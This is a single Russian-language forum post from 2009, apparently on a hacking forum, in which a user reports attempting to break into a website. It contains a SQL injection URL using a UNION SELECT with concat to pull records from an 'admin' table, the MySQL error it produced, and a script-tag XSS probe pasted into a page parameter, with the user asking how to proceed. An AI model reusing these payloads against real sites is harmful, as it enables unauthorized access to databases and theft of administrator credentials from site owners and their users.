Показать сообщение отдельно

  #7  
Старый 20.11.2009, 23:48
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Adm1n4eG

пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
вот только при запросе:
http://www.site.ru/index.php?id=1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+

получил уже такое
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id) from admin li' at line 2
жель не знаю как юзать дальше...
-------
Кстати, если ввести такое:
http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина

И как я понял - это говорит о потенциальном XSS опасности.

Последний раз редактировалось B1t.exe; 20.11.2009 в 23:57..
 
Ответить с цитированием